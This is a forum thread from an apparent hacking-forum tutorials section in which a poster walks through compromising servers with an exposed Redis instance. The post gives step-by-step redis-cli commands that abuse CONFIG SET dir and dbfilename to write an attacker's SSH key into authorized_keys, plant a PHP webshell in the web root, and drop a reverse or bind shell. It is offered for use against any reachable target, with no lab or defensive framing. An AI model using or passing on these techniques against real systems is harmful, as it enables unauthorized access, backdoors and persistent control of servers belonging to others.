![]() |
|
From Redis to complete system compromise - a step by step tutorial - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: From Redis to complete system compromise - a step by step tutorial (/Thread-From-Redis-to-complete-system-compromise-a-step-by-step-tutorial) |
From Redis to complete system compromise - a step by step tutorial - m0nk1337 - 02-22-2021 Today i just want to share a Tip about how you can compromise system if you find a redis instance on a server. First of all just check if you can make a connection to it with redis-cli : $ redis-cli -h <ip> -p <port> If you are lucky and it get's connected you will get a shell like : 123.468.932.220:6379> here you can type redis commands like set "something xyz" or "get something" but what it has to do with compromise? Well you can use redis-cli to backdoor the server in many ways like gaining ssh on it, dropping a webshell (if it has web server running), drop a reverse or bind shell, Let's see how you can do that : Adding SSH keys to the server and connect to it First generate a ssh public/private key pair on your system (or any other system you are wiling to get ssh on) $ssh-keygen -t rsa then copy the public key to a text file and write it to the redis instance, for example : $cat rekt.txt | redis-cli -h 10.68.58.02 -p 6379 -x set rekt Then you need to save this public key to the authorized_keys file on redis server >config set dir /home/$user/.ssh/ here $user can be whatever enumerated user you know. use enum4linux for that. so after that >config set dbfilename "authorized_keys" then type "save" and enter if everything goes well. you can connect to the server via ssh with your private key. $ssh -i id_rsa username@ipaddress With similar way you can drop a webshell for that you have to know the web-root directory on the server connect to the redis server and follow these >config set dir /var/www/html >config set dbfilename redis.php >set test "<?php phpinfo(); ?>" >save And similarly you can drop a reverse or bind shell just use echo -e "reverseshell/bindshell one-liner here" | redis-cli -h <ip> -p <port> -x set 1 and then connect to the redis server set dir again with config set dir command then set file name with config set dbfilename and save it at the end then you can connect to your bind or reverse shell. |